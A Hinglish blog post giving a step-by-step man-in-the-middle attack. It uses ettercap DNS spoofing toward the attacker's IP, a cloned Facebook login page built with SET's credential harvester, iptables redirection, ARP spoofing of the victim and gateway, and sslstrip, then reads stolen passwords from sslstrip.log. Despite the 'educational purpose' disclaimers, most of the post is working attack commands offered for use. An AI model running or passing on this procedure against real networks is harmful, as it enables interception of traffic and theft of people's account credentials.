Friday 27 October 2017

Man in the middle attack (MITM)

 Dosto is post par main aapko Man in the middle attack (MITM) ke bare mai puri jankari dunga yeh post sirf educational purpose ke liye hai aap apni knowledge ka miss use mat karen .MITM mai ek hacker user or web server ke bich mai connection bana leta hai jaise maanlo ek user apna facebook account open kar rha hai to ek hacker bich mai MITM attack perform kar de phir user ke pass orignal facebook ka login page open nhi hoga fake page open hoga jise hacker ne bnaya hoga or jb user apna username or password us fake page par enter karega to user ka username or password hacker ke pass pahunch jayga. is attack ko perform karne ke liye hacker ko secure connection ko todna hoga pahle jaise https se http mai convert karna hoga aap is attack ko niche dikhayi gayi picture se smjh sakte hai.



Man in the middle attack (MITM) attack ko hacker kali linux ka use karke bahut asani se kar sakta hai Man in the middle attack (MITM) karne ke liye jin tools ka use hota hai veh kali linux mai inbuilt hi hote hai maine aapko step tp step commands bata raha hu niche. ***** This Post only for educational purpose*****

Commands for MITM attacks


  • Open kali linux terminal
  • Type ( leafpad /etc/ettercap/etter.conf)
  • File open hone ke bad last mai linux likha hoga uske niche 
  • [privis] ec_uid=65534 ec_gid=65534 aapko 65534 ki jgh 0 karna hoga
  • # if you use ip tables likha hoga
  • #redir_command_on  or #redir_command_of likha hoga aapko (#) hash ko hatana hoga dono lines ke age se then save
  • Type ( leafpad /etc/ettercap/etter.dns)
  • file open hone ke bad # redirect it to www.linux.org likha hoga uske niche
  • microsoft.com A 170.170.40.56 or *.microsoft.com A 170.170.40.56 likha hoga aapko ise change karna hoga 
  • aapko microsoft.com vali har line ke age hash lgana hoga # or in lines ke upr likhna hoga
  • * A (Computer ip address) like 192.168.1.111
  • Setoolkit then social-engineering attacks then website attack vectors then credential harvester attack method then site cloner then computer ip address like 192.168.1.111 then website name joo hacker ko clone karni hogi jaise www.facebook.com
  • root/var/www folder mai 3 files ban jayegi hacker ko un files ko html folder mai move karna hoga 
  • another terminal type echo 1 > /proc/sys/net/ipv4/ip_forward 
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  • another terminal arpspoof -i eth0 -t (victims Computer ip address) like 192.168.1.112 (gateway ip address) like 192.168.1.1
  • another terminal arpspoof -i eth0 -t (gateway ip address) like 192.168.1.1 (victims Computer ip address) like 192.168.1.112
  • sslstrip -l 8080 
then jab victim facebook.com open karega to uske samne orignal facebook open nhi hogi fake page open hoga or jab victim username or passwords enter kar dega or aapko ek bat or bata rhaa hu kali linux mai jo inbuilt sslstrip hai veh updated browser mai work nahi karta hai kayi bar aap ssltrip2 ka use kar sakte hai git hub se download kar sakte hai aapko google par easily mil jayegi tab ek or command hai dekhne ke liye apko niche btayi ja rahi hai .

  • cat sslstrip.log


























mai ummeed karta hu ki aap sabko Man in the middle attack (MITM) ke bare puri mai jaankari mil gayi hogi dhyan rahe yeh post educational purpose ke liye hai .agar apko post pasand aye to share kare dhanywad .

Visit karne ke liye apka shukriya

    0 comments:

    Post a Comment

    Powered by Blogger.

    Comments

    Facebook

    Featured Posts

    Recent Posts

    Recent in Sports

    Total Pageviews

    Search This Blog

    Blog Archive

    Aap kaise hacker Banna chahte ho

    Carousel

    Event

    Breaking

    News Scroll

    Recent Posts

    Contact Form

    Name

    Email *

    Message *

    Followers

    sponsor

    sponsor
    Hacking course

    Tags

    hacking (47) kali linux (38)

    Categories

    Translate

    Recent Post

    Popular

    Facebook

    Follow Us

    Facebook